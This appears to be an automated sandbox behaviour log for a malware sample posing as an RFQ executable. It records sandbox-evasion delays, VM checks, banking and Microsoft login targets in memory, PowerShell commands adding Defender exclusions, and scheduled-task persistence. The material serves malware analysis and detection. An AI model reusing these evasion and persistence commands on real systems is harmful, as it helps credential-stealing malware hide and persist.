                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598547Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598437Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598328Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598219Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598094Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597984Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597875Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597656Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597547Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597437Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597328Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597219Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597109Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597000Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596890Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596781Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596438Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596279Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596020Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595891Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595672Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595344Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595125Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595015Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594906Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594688Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594578Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594469Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594359Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594250Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594141Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594031Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593922Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593813Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593688Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593563Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593438Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593328Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593219Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599891
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599763
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599590
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599156
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598878
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598696
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598594
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598483
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598375
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598264
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598155
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598045
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597937
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597828
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597717
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597609
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597500
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597391
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597281
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597172
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597062
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596953
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596844
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596734
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596625
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596516
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596406
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596297
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596188
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596078
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595967
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595859
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595750
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595640
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595531
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595422
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595312
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595203
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595094
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594984
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594875
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594765
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594656
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594538
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594438
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594328
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594219
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594109
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 593999
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 593891
                      Source: nDEusQ.exe, 0000000A.00000002.1658607131.0000000005B8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:^
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1599728924.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                      Source: nDEusQ.exe, 0000000E.00000002.2799234243.00000000012D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllme
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2799681396.0000000000C57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                      Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C9448 LdrInitializeThunk,9_2_065C9448
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory written: C:\Users\user\AppData\Roaming\nDEusQ.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess created: C:\Users\user\AppData\Roaming\nDEusQ.exe "C:\Users\user\AppData\Roaming\nDEusQ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
